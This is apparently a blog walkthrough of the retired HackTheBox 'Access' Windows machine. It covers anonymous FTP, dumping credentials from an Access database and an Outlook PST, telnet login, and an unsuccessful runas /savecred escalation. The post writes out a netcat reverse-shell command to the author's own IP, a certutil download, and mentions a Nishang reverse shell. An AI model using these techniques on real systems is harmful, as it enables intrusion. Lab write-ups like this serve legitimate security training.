Windows Privilege Escalation Through Runas | HackTheBox Access | CREST CRT Track

HackTheBox Access was a simple Windows box, which is great to have around because it can be difficult to identify places for new Windows users. And it didn’t use SMB, unlike other Windows boxes. We’ll begin by requesting a zip file and an Access database via anonymous FTP access. We’ll utilize command line tools to search the database for a zip file-compatible password before opening the file to discover an Outlook mail file. We’ll read the email to find the account password on the box, then use telnet to connect. From there, We’ll access root.txt in two separate methods by using cached administrator credentials.

1. Initial Scan

I kicked things off with an Nmap scan (nmap -A <IP_address>) to see what services were running. This revealed three open ports:

  • Port 21 (FTP): This allowed anonymous access.
  • Port 23 (Telnet): A potential login point.
  • Port 80 (HTTP): A simple webpage with no obvious exploitable vulnerabilities.

2. FTP Exploration

I logged into the FTP server anonymously. It was crucial to enable binary mode (binary) to ensure files downloaded correctly. I found two directories: backups and engineer. From backups, I downloaded a database file named backup.mdb. From engineer, I downloaded a zip file.

3. Database Analysis (MDB File)

Instead of using Microsoft Access, I opted for a Linux tool called mdb-tables (mdb-tables backup.mdb) to list the tables within the database. I quickly identified a promising table named authentication_user. To query this table, I used mdb-sql (mdb-sql backup.mdb).

  • First, I tried to get the usernames: select username from authentication_user; go. This revealed users: admin, engineer, and backup_admin.
  • Then, I tried to get the passwords: select password from authentication_user; go. This gave me the passwords: admin, access_for_you, @security, and admin. The password for the engineer user was access_for_you.

4. Zip File Analysis

I attempted to unzip the zip file with unzip, but it didn’t prompt for a password and didn’t extract any contents. I then used 7z e <zip_file_name>, which did prompt for a password. The password @security (which I found from the database) successfully extracted the contents, revealing a .pst file (an Outlook data file).

5. PST File Analysis

To read the .pst file without Outlook, I used the readpst tool. This extracted the mailboxes. I then used cat <mailbox_file_name> to view the contents of an email. The email, sent to security@accesscontrolsystem.com, revealed a new password for the “security” account: access_for_you.

6. Telnet Access

I used the credentials found in the email (username: security, password: access_for_you) to log in via Telnet (telnet <IP_address>). Unfortunately, the shell was extremely unstable and slow, which foreshadowed later difficulties.

7. Privilege Escalation Attempt (and Frustration!)

I navigated to the Public\Desktop directory and found a link file (.lnk). I used the type <link_file_name> command to view its contents. The link file contained a runas command: runas /user:administrator /savecred <command>. The /savecred option implied it should run the command as administrator without asking for a password, assuming the administrator account was set up for this.

My goal was to use runas to get a reverse shell as administrator. I first downloaded netcat to the target machine using certutil. I tried various runas commands to execute netcat and connect back to my machine, for example:

  • runas /user:administrator /savecred "c:\path\to\nc.exe <my_IP> <port> -e cmd.exe"
  • I also tried specifying the full path to runas.exe (c:\windows\system32\runas.exe).

To get a more stable shell, I even attempted to use a Nishang PowerShell reverse shell to connect back to my machine.

Regrettably, none of the runas commands worked. The shell was simply too buggy, and the runas command itself didn’t seem to be functioning correctly on this particular machine. Even running runas by itself didn’t produce any output.

Conclusion

Due to the extreme instability and issues with the runas command, I wasn’t able to get the root flag in this session. It’s a common frustration with some retired Hack The Box machines – they can be quite buggy! I encourage you to try it yourself, and if you find a way that works, please share it in the comments!

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles